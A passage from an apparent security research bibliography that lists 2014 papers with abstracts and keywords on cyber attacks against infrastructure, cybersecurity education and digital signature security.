    Keywords: computer network security; power distribution reliability; power engineering computing; power system security; smart meters; smart power grids; AMI; DoS-DDoS attacks; advanced metering infrastructure; critical smart grid infrastructures;cyber attack impact; distributed denial-of-service attacks; distribution system reliability; electrical distribution networks;grid topology; qualitative assessment; routers; smart grid deployment; smart meters; utility servers; Computer crime; Reliability; Servers; Smart grids; Topology; AMI; Cyber Attack; DDoS ;DoS; Reliability; Simulation; Smart Grid (ID#:14-2074)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6816504&isnumber=6816367
  • Sung-Hwan Ahn; Nam-Uk Kim; Tai-Myoung Chung, "Big data analysis system concept for detecting unknown attacks," Advanced Communication Technology (ICACT), 2014 16th International Conference on , vol., no., pp.269,272, 16-19 Feb. 2014. Recently, threat of previously unknown cyber-attacks are increasing because existing security systems are not able to detect them. Past cyber-attacks had simple purposes of leaking personal information by attacking the PC or destroying the system. However, the goal of recent hacking attacks has changed from leaking information and destruction of services to attacking large-scale systems such as critical infrastructures and state agencies. In the other words, existing defense technologies to counter these attacks are based on pattern matching methods which are very limited. Because of this fact, in the event of new and previously unknown attacks, detection rate becomes very low and false negative increases. To defend against these unknown attacks, which cannot be detected with existing technology, we propose a new model based on big data analysis techniques that can extract information from a variety of sources to detect future attacks. We expect our model to be the basis of the future Advanced Persistent Threat(APT) detection and prevention system implementations.
    Keywords: Big Data; computer crime; data mining; APT detection; Big Data analysis system; Big Data analysis techniques; advanced persistent threat detection; computer crime ;critical infrastructures; cyber-attacks; data mining; defense technologies; detection rate; future attack detection; hacking attacks; information extraction; large-scale system attacks; pattern matching methods; personal information leakage; prevention system; security systems; service destruction; state agencies; unknown attack detection; Data handling; Data mining; Data models; Data storage systems; Information management; Monitoring; Security; Alarm systems; Computer crime; Data mining; Intrusion detection (ID#:14-2075)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6778962&isnumber=6778899
  • Yi-Lu Wang; Sang-Chin Yang, "A Method of Evaluation for Insider Threat," Computer, Consumer and Control (IS3C), 2014 International Symposium on , vol., no., pp.438,441, 10-12 June 2014. Due to cyber security is an important issue of the cloud computing. Insider threat becomes more and more important for cyber security, it is also much more complex issue. But till now, there is no equivalent to a vulnerability scanner for insider threat. We survey and discuss the history of research on insider threat analysis to know system dynamics is the best method to mitigate insider threat from people, process, and technology. In the paper, we present a system dynamics method to model insider threat. We suggest some concludes for future research who are interested in insider threat issue The study.
    Keywords: cloud computing; security of data; cloud computing; cyber security; insider threat analysis ;insider threat evaluation; insider threat mitigation ;vulnerability scanner; Analytical models; Computer crime; Computers; Educational institutions; Organizations; Insider threat; System Dynamic (ID#:14-2076)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845913&isnumber=6845429
  • Djouadi, Seddik M.; Melin, Alexander M.; Ferragut, Erik M.; Laska, Jason A; Dong, Jin, "Finite energy and bounded attacks on control system sensor signals," American Control Conference (ACC), 2014 , vol., no., pp.1716,1722, 4-6 June 2014. Control system networks are increasingly being connected to enterprise level networks. These connections leave critical industrial controls systems vulnerable to cyber-attacks. Most of the effort in protecting these cyber-physical systems (CPS) from attacks has been in securing the networks using information security techniques. Effort has also been applied to increasing the protection and reliability of the control system against random hardware and software failures. However, the inability of information security techniques to protect against all intrusions means that the control system must be resilient to various signal attacks for which new analysis methods need to be developed. In this paper, sensor signal attacks are analyzed for observer-based controlled systems. The threat surface for sensor signal attacks is subdivided into denial of service, finite energy, and bounded attacks. In particular, the error signals between states of attack free systems and systems subject to these attacks are quantified. Optimal sensor and actuator signal attacks for the finite and infinite horizon linear quadratic (LQ) control in terms of maximizing the corresponding cost functions are computed. The closed-loop systems under optimal signal attacks are provided. Finally, an illustrative numerical example using a power generation network is provided together with distributed LQ controllers.
    Keywords: Closed loop systems; Computer crime; Cost function; Eigenvalues and eigenfunctions; Generators; Vectors; Control applications; Emerging control theory; Fault-tolerant systems (ID#:14-2077)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6859001&isnumber=6858556

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Cybersecurity Education

Cybersecurity Education


Education As a discipline in higher education, cybersecurity is less than two decades old. But because of the large number of qualified professionals needed, many universities offer cybersecurity education in a variety of delivery formats--live, online, and hybrid. Much of the curriculum has been driven by NSTISSI standards written in the early 1990s. A new look, based on research, is producing new ideas for how to better train cybersecurity professionals. The articles cited here are from the first half of 2014.

  • Conklin, W.A; Cline, R.E.; Roosa, T., "Re-engineering Cybersecurity Education in the US: An Analysis of the Critical Factors," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.2006,2014, 6-9 Jan. 2014. doi: 10.1109/HICSS.2014.254 The need for cyber security professionals continues to grow and education systems are responding in a variety of way. The US government has weighed in with two efforts, the NICE effort led by NIST and the CAE effort jointly led by NSA and DHS. Industry has unfilled needs and the CAE program is changing to meet both NICE and industry needs. This paper analyzes these efforts and examines several critical, yet unaddressed issues facing school programs as they adapt to new criteria and guidelines. Technical issues are easy to enumerate, yet it is the programmatic and student success factors that will define successful programs.
    Keywords: computer science education; security of data; CAE program; DHS; Department of Homeland Security; NICE effort; NIST; NSA; National Initiative for Cybersecurity Education; National Security Agency; US government; critical factors analysis; cyber security professionals; cybersecurity education re-engineering; education systems; programmatic factors; school programs; student success factors; Computer security; Educational institutions; Government; Industries; Information security (ID#:14-2078)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6758852&isnumber=6758592
  • Kessler, G.C.; Ramsay, J.D., "A Proposed Curriculum in Cybersecurity Education Targeting Homeland Security Students," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.4932,4937, 6-9 Jan. 2014. doi: 10.1109/HICSS.2014.605 Homeland Security (HS) is a growing field of study in the U.S. today, generally covering risk management, terrorism studies, policy development, and other topics related to the broad field. Information security threats to both the public and private sectors are growing in intensity, frequency, and severity, and are a very real threat to the security of the nation. While there are many models for information security education at all levels of higher education, these programs are invariably offered as a technical course of study, these curricula are generally not well suited to HS students. As a result, information systems and cyber security principles are underrepresented in the typical HS program. The authors propose a course of study in cyber security designed to capitalize on the intellectual strengths of students in this discipline and that are consistent with the broad suite of professional needs in this discipline.
    Keywords: computer aided instruction; educational courses; further education; risk management; security of data; HS; cyber security principles; cybersecurity education; higher education; homeland security students ;information security; information security education; information systems; policy development; private sectors; proposed curriculum; public sectors; risk management; terrorism studies; Computer security; Computers; Cyberspace; Education; Information security; Terrorism; Homeland security education; cybersecurity education (ID#:14-2079)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759208&isnumber=6758592
  • Barclay, Corlane, "Sustainable Security Advantage In A Changing Environment: The Cybersecurity Capability Maturity Model (CM2)," ITU Kaleidoscope Academic Conference: Living in a converged world - Impossible without standards?, Proceedings of the 2014 , vol., no., pp.275,282, 3-5 June 2014 doi: 10.1109. With the rapid advancement in technology and the growing complexities in the interaction of these technologies and networks, it is even more important for countries and organizations to gain sustainable security advantage. Security advantage refers to the ability to manage and respond to threats and vulnerabilities with a proactive security posture. This is accomplished through effectively planning, managing, responding to and recovering from threats and vulnerabilities. However not many organizations and even countries, especially in the developing world, have been able to equip themselves with the necessary and sufficient know-how or ability to integrate knowledge and capabilities to achieve security advantage within their environment. Having a structured set of requirements or indicators to aid in progressively attaining different levels of maturity and capabilities is one important method to determine the state of cybersecurity readiness. The research introduces the Cybersecurity Capability Maturity Model (CM2), a 6-step process of progressive development of cybersecurity maturity and knowledge integration that ranges from a state of limited awareness and application of security controls to pervasive optimization of the protection of critical assets.
    Keywords: Capability maturity model; Computer crime; Context; Education; Organizations; CM2; capabilities; cybersecurity Capability Maturity Model; privacy; security; security advantage (ID#:14-2080)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6858466&isnumber=6858455
  • Daniel Manson, Ronald Pike, "The Case For Depth In Cybersecurity Education," ACM Inroads, Volume 5 Issue 1, March 2014, Pages 47-52 doi>10.1145/2568195.2568212 In his book Outliers, Malcom Gladwell describes the 10,000-Hour Rule, a key to success in any field, as simply a matter of practicing a specific task that can be accomplished with 20 hours of work a week for 10 years [10]. Ongoing changes in technology and national security needs require aspiring excellent cybersecurity professionals to set a goal of 10,000 hours of relevant, hands-on skill development. The education system today is ill prepared to meet the challenge of producing an adequate number of cybersecurity professionals, but programs that use competitions and learning environments that teach depth are filling this void.
    Keywords: cybersecurity, depth, education (ID#:14-2081)
    URL: http://dl.acm.org/citation.cfm?doid=2568195.2568212 or http://doi.acm.org/10.1145/2568195.2568212
  • Marcin Lukowiak, Stanislaw Radziszowski, James Vallino, Christopher Wood, "Cybersecurity Education: Bridging the Gap Between Hardware and Software Domains," ACM Transactions on Computing Education (TOCE) TOCE Homepage, Volume 14 Issue 1, March 2014, Article No. 2. With the continuous growth of cyberinfrastructure throughout modern society, the need for secure computing and communication is more important than ever before. As a result, there is also an increasing need for entry-level developers who are capable of designing and building practical solutions for systems with stringent security requirements. This calls for careful attention to algorithm choice and implementation method, as well as trade-offs between hardware and software implementations. This article describes motivation and efforts taken by three departments at Rochester Institute of Technology (Computer Engineering, Computer Science, and Software Engineering) that were focused on creating a multidisciplinary course that integrates the algorithmic, engineering, and practical aspects of security as exemplified by applied cryptography. In particular, the article presents the structure of this new course, topics covered, lab tools and results from the first two spring quarter offerings in 2011 and 2012.
    Keywords: Security-oriented curriculum, cybersecurity education, hardware and software design, multidisciplinary applied cryptography (ID#:14-2082)
    URL: http://dl.acm.org/citation.cfm?doid=2600089.2538029 or http://doi.acm.org/10.1145/2538029
  • David Klaper, Eduard Hovy, "A Taxonomy And A Knowledge Portal For Cybersecurity," Proceedings of the 15th Annual International Conference on Digital Government Research , June 2014, Pages 79-85. doi>10.1145/2612733.2612759 Smart government is possible only if the security of sensitive data can be assured. The more knowledgeable government officials and citizens are about cybersecurity, the better are the chances that government data is not compromised or abused. In this paper, we present two systems under development that aim at improving cybersecurity education. First, we are creating a taxonomy of cybersecurity topics that provides links to relevant educational or research material. Second, we are building a portal that serves as platform for users to discuss the security of websites. These sources can be linked together. This helps to strengthen the knowledge of government officials and citizens with regard to cybersecurity issues. These issues are a central concern for open government initiatives.
    Keywords: cybersecurity, education, systematization, taxonomy (ID#:14-2083)
    URL: http://dl.acm.org/citation.cfm?doid=2612733.2612759 or http://doi.acm.org/10.1145/2612733.2612759
  • Barbara E. Endicott-Popovsky, Viatcheslav M. Popovsky, "Application of Pedagogical Fundamentals For The Holistic Development Of Cybersecurity Professionals," ACM Inroads, Volume 5 Issue 1, March 2014, Pages 57-68. doi>10.1145/2568195.2568214 Nowhere is the problem of lack of human capital more keenly felt than in the field of cybersecurity where the numbers and quality of well-trained graduates are woefully lacking [10]. In 2005, the National Academy of Sciences indicted the US education system as the culprit contributing to deficiencies in our technical workforce, sounding the alarm that we are at risk of losing our competitive edge [14]. While the government has made cybersecurity education a national priority, seeking to stimulate university and community college production of information assurance (IA) expertise, they still have thousands of IA jobs going unfilled. The big question for the last decade [17] has been 'where will we find the talent we need?' In this article, we describe one university's approach to begin addressing this problem and discuss an innovative curricular model that holistically develops future cybersecurity professionals.
    Keywords: cybersecurity, education and workforce development, pedagogy (ID#:14-2084)
    URL: http://dl.acm.org/citation.cfm?doid=2568195.2568214 or http://doi.acm.org/10.1145/2568195.2568214
  • Andrew McGettrick, Lillian N. Cassel, Melissa Dark, Elizabeth K. Hawthorne, John Impagliazzo, "Toward Curricular Guidelines For Cybersecurity," Proceedings of the 45th ACM Technical Symposium On Computer Science Education, March 2014, Pages 81-82. doi>10.1145/2538862.2538990 This session reports on a workshop convened by the ACM Education Board with funding by the US National Science Foundation and invites discussion from the community on the workshop findings. The topic, curricular directions for cybersecurity, is one that resonates in many departments considering how best to prepare graduates to face the challenges of security issues in employment and future research. The session will include presentation of the workshop context and conclusions, but will be open to participant discussion. This will be the first public presentation of the results of the workshop and the first opportunity for significant response.
    Keywords: curriculum, security (ID#:14-2085)
    URL: http://dl.acm.org/citation.cfm?doid=2538862.2538990 or http://doi.acm.org/10.1145/2538862.2538990
  • Khaled Salah, "Harnessing the Cloud For Teaching Cybersecurity," Proceedings of the 45th ACM Technical Symposium On Computer Science Education, March 2014, Pages 529-534. doi>10.1145/2538862.2538880 Cloud computing has become an attractive paradigm for many organizations in government, industry as well as academia. In academia, the cloud can offer instructors and students (whether local or at a distance) on-demand, dedicated, isolated, unlimited, and easily configurable machines. Such an approach has clear advantages over access to machines in a classic lab setting. In this paper, we show how cloud services and infrastructure could be harnessed to facilitate practical experience and training for cybersecurity. We used the popular Amazon Web Services (AWS) cloud; however, the use cases and approaches laid out in this paper are also applicable to other cloud providers.
    Keywords: cloud, cloud computing, computer security, cybersecurity, long distance education, network security, security (ID#:14-2086)
    URL: http://dl.acm.org/citation.cfm?doid=2538862.2538880 or http://doi.acm.org/10.1145/2538862.2538880
  • David H. Tobey, Portia Pusey, Diana L. Burley, "Engaging Learners In Cybersecurity Careers: Lessons From The Launch Of The National Cyber League," ACM Inroads, Volume 5 Issue 1, March 2014, Pages 53-56. doi>10.1145/2568195.2568213 Educators and sponsors endorse competitions as a strong, positive influence on career choice. However, empirical studies of cybersecurity competitions are lacking, and evidence from computer science and mathematics competitions has been mixed. Here we report initial results from an ongoing study of the National Cyber League to provide a glimpse of the role of competitions in fostering cybersecurity career engagement. Preliminary results suggest that cyber competitions attract experienced individuals who will remain in the profession for the long-term, but future research is needed to understand how cyber competitions may engage women and those new to the field.
    Keywords: competitions, cybersecurity, education and workforce development (ID#:14-2088)
    URL: http://dl.acm.org/citation.cfm?doid=2568195.2568213 or http://doi.acm.org/10.1145/2568195.2568213

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Digital Signature Security

Digital Signature Security



A digital signature is one of the most common ways to authenticate. Using a mathematical scheme, the signature assures the reader that the message was created and sent by a known sender. But not all signature schemes are secure. The research challenge is to find new and better ways to protect, transfer, and utilize digital signatures. The articles cited here, published in the first half of 2014, discuss both theory and practice.

  • Yueying Huang; Jingang Zhang; Houyan Chen, "On The Security Of A Certificateless Signcryption Scheme," Electronics, Computer and Applications, 2014 IEEE Workshop on, vol., no., pp.664,667, 8-9 May 2014. Signcryption is a cryptographic primitive that simultaneously realizes both the functions of public key encryption and digital signature in a logically single step, and with a cost significantly lower than that required by the traditional "signature and encryption" approach. Recently, an efficient certificateless signcryption scheme without using bilinear pairings was proposed by Zhu et al., which is claimed secure based on the assumptions that the compute Diffie-Hellman problem and the discrete logarithm problem are difficult. Although some security arguments were provided to show the scheme is secure, in this paper, we find that the signcryption construction due to Zhu et al. is not as secure as claimed. Specifically, we describe an adversary that can break the IND-CCA2 security of the scheme without any Unsigncryption query. Moreover, we demonstrate that the scheme is insecure against key replacement attack by describing a concrete attack approach.
    Keywords: digital signatures; group theory; public key cryptography; Diffie-Hellman problem; IND-CCA2 security; certificateless signcryption scheme; concrete attack approach; cryptographic primitive; digital signature; discrete logarithm problem; key replacement attack; public key encryption; Computers; Encryption; Games; Public key; Receivers; Cryptography; Digital Signcryption; Key replacement attack; Security analysis (ID#:14-2090)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845707&isnumber=6845536
  • Kishore, N.; Kapoor, B., "An Efficient Parallel Algorithm For Hash Computation In Security And Forensics Applications," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.873,877, 21-22 Feb. 2014. Hashing algorithms are used extensively in information security and digital forensics applications. This paper presents an efficient parallel algorithm hash computation. It's a modification of the SHA-1 algorithm for faster parallel implementation in applications such as the digital signature and data preservation in digital forensics. The algorithm implements recursive hash to break the chain dependencies of the standard hash function. We discuss the theoretical foundation for the work including the collision probability and the performance implications. The algorithm is implemented using the OpenMP API and experiments performed using machines with multicore processors. The results show a performance gain by more than a factor of 3 when running on the 8-core configuration of the machine.
    Keywords: application program interfaces; cryptography; digital forensics; digital signatures; file organization; parallel algorithms; probability; Open MP API;SHA-1 algorithm; collision probability; data preservation; digital forensics; digital signature; hash computation; hashing algorithms; information security; parallel algorithm; standard hash function; Algorithm design and analysis; Conferences; Cryptography; Multicore processing; Program processors; Standards; Cryptographic Hash Function; Digital Forensics; Digital Signature; MD5; Multicore Processors; OpenMP;SHA-1 (ID#:14-2091)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779437&isnumber=6779283
  • Deepak Singh Chouhan; Mahajan, R.P., "An Architectural Framework For Encryption & Generation Of Digital Signature Using DNA Cryptography," Computing for Sustainable Global Development (INDIACom), 2014 International Conference on , vol., no., pp.743,748, 5-7 March 2014. As most of the modern encryption algorithms are broken fully/partially, the world of information security looks in new directions to protect the data it transmits. The concept of using DNA computing in the fields of cryptography has been identified as a possible technology that may bring forward a new hope for hybrid and unbreakable algorithms. Currently, several DNA computing algorithms are proposed for cryptography, cryptanalysis and steganography problems, and they are proven to be very powerful in these areas. This paper gives an architectural framework for encryption & Generation of digital signature using DNA Cryptography. To analyze the performance; the original plaintext size and the key size; together with the encryption and decryption time are examined also the experiments on plaintext with different contents are performed to test the robustness of the program.
    Keywords: Ciphers; DNA; DNA computing; Digital signatures; Encoding; Encryption; DNA; DNA computing; DNA cryptography; DNA digital coding (ID#:14-2092)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828061&isnumber=6827395
  • Skarmeta, AF.; Hernandez-Ramos, J.L.; Moreno, M.V., "A Decentralized Approach For Security And Privacy Challenges In The Internet Of Things," Internet of Things (WF-IoT), 2014 IEEE World Forum on , vol., no., pp.67,72, 6-8 March 2014. The strong development of the Internet of Things (IoT) is dramatically changing traditional perceptions of the current Internet towards an integrated vision of smart objects interacting with each other. While in recent years many technological challenges have already been solved through the extension and adaptation of wireless technologies, security and privacy still remain as the main barriers for the IoT deployment on a broad scale. In this emerging paradigm, typical scenarios manage particularly sensitive data, and any leakage of information could severely damage the privacy of users. This paper provides a concise description of some of the major challenges related to these areas that still need to be overcome in the coming years for a full acceptance of all IoT stakeholders involved. In addition, we propose a distributed capability-based access control mechanism which is built on public key cryptography in order to cope with some of these challenges. Specifically, our solution is based on the design of a lightweight token used for access to CoAP Resources, and an optimized implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) inside the smart object. The results obtained from our experiments demonstrate the feasibility of the proposal and show promising in order to cover more complex scenarios in the future, as well as its application in specific IoT use cases.
    Keywords: Internet of Things; authorization; computer network security; data privacy; digital signatures; personal area networks; public key cryptography; 6LoWPAN; CoAP resources; ECDSA; Internet of Things; IoT deployment; IoT stakeholders; distributed capability-based access control mechanism; elliptic curve digital signature algorithm; information leakage; lightweight token; public key cryptography; security challenges; sensitive data management; user privacy; wireless technologies;Authentication;Authorization;Cryptography;Internet;Privacy;6LoWPAN;Internet of Things; Privacy; Security; cryptographic primitives; distributed access control (ID#:14-2093)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6803122&isnumber=6803102
  • Trabelsi, Wiem; Selmi, Mohamed Heny, "Multi-signature Robust Video Watermarking," Advanced Technologies for Signal and Image Processing (ATSIP), 2014 1st International Conference on , vol., no., pp.158,163, 17-19 March 2014. Watermarking is a recently developed technique which is currently dominating the world of security and digital processing in order to ensure the protection of digitized trade. The purpose of this work is twofold. It is firstly to establish a state of the art that goes through the existing watermarking methods and their performances. And secondly to design, implement and evaluate a new watermarking solution that aims to optimize the compromise robustness-invisibility-capacity. The proposed approach consists on applying a frequency watermarking based on singular value decomposition (SVD) and exploiting the mosaic made from all video frames as well as inserting a double signature in order to increase watermarking algorithm capacity.
    Keywords: Image coding; PSNR; Robustness; Singular value decomposition; Streaming media; Watermarking; Singular Value Decomposition; invisibility; mosaic; robustness; video watermarking (ID#:14-2094)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6834597&isnumber=6834578
  • Vollala, S.; Varadhan, V.V.; Geetha, K.; Ramasubramanian, N., "Efficient Modular Multiplication Algorithms For Public Key Cryptography," Advance Computing Conference (IACC), 2014 IEEE International, vol., no., pp.74,78, 21-22 Feb. 2014. The modular exponentiation is an important operation for cryptographic transformations in public key cryptosystems like the Rivest, Shamir and Adleman, the Difie and Hellman and the ElGamal schemes. computing ax mod n and axby mod n for very large x,y and n are fundamental to the efficiency of almost all pubic key cryptosystems and digital signature schemes. To achieve high level of security, the word length in the modular exponentiations should be significantly large. The performance of public key cryptography is primarily determined by the implementation efficiency of the modular multiplication and exponentiation. As the words are usually large, and in order to optimize the time taken by these operations, it is essential to minimize the number of modular multiplications. In this paper we are presenting efficient algorithms for computing ax mod n and axby mod n. In this work we propose four algorithms to evaluate modular exponentiation. Bit forwarding (BFW) algorithms to compute ax mod n, and to compute axby mod n two algorithms namely Substitute and reward (SRW), Store and forward(SFW) are proposed. All the proposed algorithms are efficient in terms of time and at the same time demands only minimal additional space to store the pre-computed values. These algorithms are suitable for devices with low computational power and limited storage.
    Keywords: digital signatures; public key cryptography; BFW algorithms; bit forwarding algorithms; cryptographic transformations; digital signature schemes; modular exponentiation; modular multiplication algorithms; public key cryptography; public key cryptosystems; store and forward algorithms; substitute and reward algorithms; word length; Algorithm design and analysis; Ciphers; Conferences; Encryption; Public key cryptography; Modular Multiplication; Public key cryptography(PKC); RSA; binary exponentiation (ID#:14-2095)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779297&isnumber=6779283
  • Miyoung Jang; Min Yoon; Jae-Woo Chang, "A Privacy-Aware Query Authentication Index For Database Outsourcing," Big Data and Smart Computing (BIGCOMP), 2014 International Conference on , vol., no., pp.72,76, 15-17 Jan. 2014. Recently, cloud computing has been spotlighted as a new paradigm of database management system. In this environment, databases are outsourced and deployed on a service provider in order to reduce cost for data storage and maintenance. However, the service provider might be untrusted so that the two issues of data security, including data confidentiality and query result integrity, become major concerns for users. Existing bucket-based data authentication methods have problem that the original spatial data distribution can be disclosed from data authentication index due to the unsophisticated data grouping strategies. In addition, the transmission overhead of verification object is high. In this paper, we propose a privacy-aware query authentication which guarantees data confidentiality and query result integrity for users. A periodic function-based data grouping scheme is designed to privately partition a spatial database into small groups for generating a signature of each group. The group signature is used to check the correctness and completeness of outsourced data when answering a range query to users. Through performance evaluation, it is shown that proposed method outperforms the existing method in terms of range query processing time up to 3 times.
    Keywords: cloud computing; data integrity; data privacy; database indexing; digital signatures; outsourcing; query processing; visual databases; bucket-based data authentication methods; cloud computing; cost reduction; data confidentiality; data maintenance; data security; data storage; database management system; database outsourcing; group signature; periodic function-based data grouping scheme; privacy-aware query authentication index; query result integrity; range query answering; service provider ;spatial data distribution; spatial database; unsophisticated data grouping strategy; verification object transmission overhead; Authentication; Encryption; Indexes ;Query processing; Spatial databases; Data authentication index; Database outsourcing; Encrypted database; Query result integrity (ID#:14-2096)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6741410&isnumber=6741395
  • Zhenlong Yuan; Cuilan Du; Xiaoxian Chen; Dawei Wang; Yibo Xue, "SkyTracer: Towards Fine-Grained Identification For Skype Traffic Via Sequence Signatures," Computing, Networking and Communications (ICNC), 2014 International Conference on , vol., no., pp.1,5, 3-6 Feb. 2014. Skype has been a typical choice for providing VoIP service nowadays and is well-known for its broad range of features, including voice-calls, instant messaging, file transfer and video conferencing, etc. Considering its wide application, from the viewpoint of ISPs, it is essential to identify Skype flows and thus optimize network performance and forecast future needs. However, in general, a host is likely to run multiple network applications simultaneously, which makes it much harder to classify each and every Skype flow from mixed traffic exactly. Especially, current techniques usually focus on host-level identification and do not have the ability to identify Skype traffic at the flow-level. In this paper, we first reveal the unique sequence signatures of Skype UDP flows and then implement a practical online system named SkyTracer for precise Skype traffic identification. To the best of our knowledge, this is the first time to utilize the strong sequence signatures to carry out early identification of Skype traffic. The experimental results show that SkyTracer can achieve very high accuracy at fine-grained level in identifying Skype traffic.
    keywords: IP networks; Internet; Internet telephony; computer network performance evaluation; digital signatures ;optimisation; telecommunication traffic; transport protocols; ISP; SkyTracer; Skype UDP flow; VoIP service; fine grained Skype traffic identification accuracy; host level identification; network performance optimization; unique sequence signatures; Accuracy; Complexity theory; Educational institutions; IP networks; Information security; Payloads; Protocols; Correlation-based Approach; Flow-level Identification; Sequence Signature; Skype (ID#:14-2097)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6785294&isnumber=6785290
  • Kuzhalvaimozhi, S.; Rao, G.Raghavendra, "Privacy Protection In Cloud Using Identity Based Group Signature," Applications of Digital Information and Web Technologies (ICADIWT), 2014 Fifth International Conference on the, vol., no., pp.75,80, 17-19 Feb. 2014. Cloud computing is one of the emerging computing technology where costs are directly proportional to usage and demand. The advantages of this technology are the reasons of security and privacy problems. The data belongs to the users are stored in some cloud servers which is not under their own control. So the cloud services are required to authenticate the user. In general, most of the cloud authentication algorithms do not provide anonymity of the users. The cloud provider can track the users easily. The privacy and authenticity are two critical issues of cloud security. In this paper, we propose a secure anonymous authentication method for cloud services using identity based group signature which allows the cloud users to prove that they have privilege to access the data without revealing their identities.
    Keywords: Authentication; Cloud computing; Elliptic curve cryptography ; Privacy; Cloud; Group Signature; Identity based cryptosystem; Privacy Protection (ID#:14-2098)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814670&isnumber=6814661
  • Premnath, Amritha Puliadi; Jo, Ju-Yeon; Kim, Yoohwan, "Application of NTRU Cryptographic Algorithm for SCADA Security," Information Technology: New Generations (ITNG), 2014 11th International Conference on , vol., no., pp.341,346, 7-9 April 2014. Critical Infrastructure represents the basic facilities, services and installations necessary for functioning of a community, such as water, power lines, transportation, or communication systems. Any act or practice that causes a real-time Critical Infrastructure System to impair its normal function and performance will have debilitating impact on security and economy, with direct implication on the society. SCADA (Supervisory Control and Data Acquisition) system is a control system which is widely used in Critical Infrastructure System to monitor and control industrial processes autonomously. As SCADA architecture relies on computers, networks, applications and programmable controllers, it is more vulnerable to security threats/attacks. Traditional SCADA communication protocols such as IEC 60870, DNP3, IEC 61850, or Modbus did not provide any security services. Newer standards such as IEC 62351 and AGA-12 offer security features to handle the attacks on SCADA system. However there are performance issues with the cryptographic solutions of these specifications when applied to SCADA systems. This research is aimed at improving the performance of SCADA security standards by employing NTRU, a faster and light-weight NTRU public key algorithm for providing end-to-end security.
    Keywords: Authentication; Digital signatures; Encryption; IEC standards; SCADA systems; AGA-12; Critical Infrastructure System; IEC 62351; NTRU cryptographic algorithm; SCADA communication protocols over TCP/IP (ID#:14-2099)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6822221&isnumber=6822158
  • Ramya, T.; Malathi, S.; Pratheeksha, G.R.; Kumar, V.D.Ambeth, "Personalized Authentication Procedure For Restricted Web Service Access In Mobile Phones," Applications of Digital Information and Web Technologies (ICADIWT), 2014 Fifth International Conference on the , vol., no., pp.69,74, 17-19 Feb. 2014. Security as a condition is the degree of resistance to, or protection from harm. Securing gadgets in a way that is simple for the user to deploy yet, stringent enough to deny any malware intrusions onto the protected circle is investigated to find a balance between the extremes. Basically, the dominant approach on current control access is via password or PIN, but its flaw is being clearly documented. An application (to be incorporated in a mobile phone) that allows the user's gadget to be used as a Biometric Capture device in addition to serve as a Biometric Signature acquisition device for processing a multi-level authentication procedure to allow access to any specific Web Service of exclusive confidentiality is proposed. To evaluate the lucidness of the proposed procedure, a specific set of domain specifications to work on are chosen and the accuracy of the Biometric face Recognition carried out is evaluated along with the compatibility of the Application developed with different sample inputs. The results obtained are exemplary compared to the existing other devices to suit a larger section of the society through the Internet for improving the security.
    Keywords: Authentication; Face recognition; Mobile communication; Performance evaluation; Servers; Smart phones; Biometric Recognition; Face Recognition; Internet; Mobile Phones; Multi-Level Authentication; Security; Web Services (ID#:14-2100)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814702&isnumber=6814661
  • Alshammari, H.; Elleithy, K.; Almgren, K.; Albelwi, S., "Group Signature Entanglement In E-Voting System," Systems, Applications and Technology Conference (LISAT), 2014 IEEE Long Island , vol., no., pp.1,4, 2-2 May 2014. In any security system, there are many security issues that are related to either the sender or the receiver of the message. Quantum computing has proven to be a plausible approach to solving many security issues such as eavesdropping, replay attack and man-in-the-middle attack. In the e-voting system, one of these issues has been solved, namely, the integrity of the data (ballot). In this paper, we propose a scheme that solves the problem of repudiation that could occur when the voter denies the value of the ballot either for cheating purposes or for a real change in the value by a third party. By using an entanglement concept between two parties randomly, the person who is going to verify the ballots will create the entangled state and keep it in a database to use it in the future for the purpose of the non-repudiation of any of these two voters.
    Keywords: digital signatures; politics; quantum computing; security of data; ballots; cheating purposes; database; e-voting system; eavesdropping; entangled state; group signature entanglement; man-in-the-middle attack; quantum computing; replay attack; security system; Authentication; Electronic voting; Protocols; Quantum computing; Quantum entanglement; Receivers; E-voting System; Entangled State; Entanglement; Quantum Computing; Qubit (ID#:14-2101)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845186&isnumber=6845183

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Hardware Trojan Horse Detection

